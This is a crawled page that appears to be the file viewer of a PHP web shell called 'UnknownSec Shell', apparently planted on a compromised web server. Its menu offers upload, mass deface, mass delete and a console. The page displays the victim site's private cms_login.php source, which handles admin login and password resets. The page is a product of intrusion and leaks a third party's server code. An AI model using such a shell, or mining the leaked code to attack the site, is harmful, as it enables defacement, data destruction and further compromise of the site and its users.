shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
cms_login.php
<?php include('ini.php'); $Template = new Template; $Users = new Users; if (!isset($_SESSION['LID'])){ $_SESSION['LID'] = ''; } // echo __line__.": ".$_SERVER['REQUEST_METHOD'] ."<br>"; // print_r($_POST); // print_r($_POST); // echo "line ".__line__.": ".$_POST['username']." ".$_POST['email']."<br>"; $error = false; // validate login if ($_POST['submitBut'] == 'Login'){ if ($_POST['uname'] != '' && $_POST['pword'] != ''){ $result = $Users->validate_login($_POST['uname'], $_POST['pword']); } else { $error = true; } } else if ($_POST['submitBut'] == 'Reset Password'){ if ($_POST['username'] != '' && $_POST['email'] != ''){ $temp_pass_result = $Users->reset_pass($_POST['username'], $_POST['email']); } else { $Template->set_alert('Please provide your username & email address', 'error'); $temp_pass_result = false; } } include('includes/admin_header.php'); $Template = new Template; echo $Template->get_alerts('error'); echo $Template->get_alerts('success'); // echo __line__.": ". $temp_pass_result."<br>"; // echo __line__.": ".$_SERVER['REQUEST_METHOD'] ." | ".$_POST['submitBut']."<br>"; if ($_SESSION['LID'] > 0){ echo "<div class='col-12 centre'>Select from the menu at the top to proceed.</div>"; } else { if ($_POST['submitBut'] == 'Reset Password' && $temp_pass_result === true){ $Template->load('views/v_reset_pass_result.php'); } else if ($_POST['submitBut'] == 'Lost Password' || ($_POST['submitBut'] == 'Reset Password' && $temp_pass_result !== true)){ $Template->load('views/v_reset_pass.php'); } else { $Template->load('views/v_admin_login.php'); } } // echo __line__.": <pre>"; print_r($GLOBALS); print_r($_SESSION); echo "</pre>"; include('includes/admin_footer.php'); ?>
© 2026 UnknownSec